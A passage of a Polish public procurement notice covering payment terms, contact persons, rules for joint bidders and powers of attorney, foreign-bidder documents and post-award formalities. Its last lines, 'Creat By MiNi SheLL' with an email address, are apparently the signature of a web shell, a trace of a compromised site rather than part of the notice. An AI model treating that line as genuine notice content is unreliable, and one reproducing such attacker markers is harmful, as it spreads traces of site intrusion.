- cena formularza Specyfikacji Istotnych Warunków Zamówienia (w siedzibie WZR)- 20 zł (+ VAT ) 
- język , w którym można sporządzać oferty : PL
Osoby do kontaktów : Pan inż. Marian Olbromski tel. 691-788- 606 lub Pan mgr inż. Zbigniew Kunikowski pod nr telefonu (0-58) 555-75-23.
- w sprawach formalnych - p. Katarzyna Gronek - inspektor ds. zamówień publicznych - tel.: 058-555-75-28 (dni robocze - w godzinach: 8.00 - 15.30)
Główne warunki finansowania i płatności : 
Płatności w terminie do 30 dni od daty podpisania protokołu końcowego i doręczenia faktury.
Forma prawna, jaką musi przyjąć grupa wykonawców, której zostanie udzielone zamówienie : 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo : 
- listę Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oraz 
- dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia .    
Pełnomocnictwo musi być złożone w formie oryginału, poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu. Treść pełnomocnictwa musi jednoznacznie określać czynności, do wykonywania których pełnomocnik jest upoważniony. 
Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda -przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność  za niewykonanie lub nienależyte wykonanie zobowiązania .
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - każdy z Wykonawców poświadcza także własne dokumenty.
DODATKOWA INFORMACJA DLA WYKONAWCÓW:
- MAJĄCYCH SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA ZA GRANICĄ: 
1. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 1.10, 1.11 i 1.12 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
	1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	2)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 
3. Dokumenty, o których mowa w ust. 1 pkt 1) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z wyjątkiem dokumentu wymienionego w ust. 1 pkt 2), który powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
WSPÓLNIE UBIEGAJĄCYCH SIĘ O UDZIELENIE ZAMÓWIENIA: 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - Wykonawcy są zobowiązani dołączyć dodatkowo dokument ustanawiający pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.
Dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu; treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony.
Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania wynikającego ze złożonej oferty.
UWAGA: jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana - Zamawiający zażąda - przed podpisaniem umowy - umowy regulującej współpracę tych podmiotów. 
Każdy z Wykonawców jest zobowiązany złożyć dokumenty wymagane przez Zamawiającego w jednej z następujących form (nie dotyczy pełnomocnictw):
- oryginały,
- kserokopie poświadczone za zgodność z oryginałem przez Wykonawcę.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia - kopie dokumentów dotyczących odpowiednio Wykonawcy są poświadczane za zgodność z oryginałem przez Wykonawcę.
6.	Formalności po wyborze oferty:
a)	Zamawiający po wyborze oferty zawiadomi pisemnie Wykonawcę, którego oferta zostanie wybrana o dacie i miejscu zawarcia Umowy.
b)	Umowa z Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą zostanie zawarta w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało przesłane w sposób określony w art. 27 ust. 2 ustawy Prawo zamówień publicznych, albo 10 dni - jeżeli zostało przesłane w inny sposób, z zastrzeżeniem art. 94 ust. 2 ustawy Prawo zamówień publicznych (Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem wskazanych terminów, jeżeli w postępowaniu o udzielenie zamówienia w przypadku trybu przetargu nieograniczonego złożono tylko jedną ofertę, lub w postępowaniu o udzielenie zamówienia nie odrzucono żadnej oferty oraz nie wykluczono żadnego Wykonawcy).
Nie jest to zamówienie o charakterze powtarzającym się. 
Zamówienie nie dotyczy projektu/programu finansowanego ze środków wspólnotowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com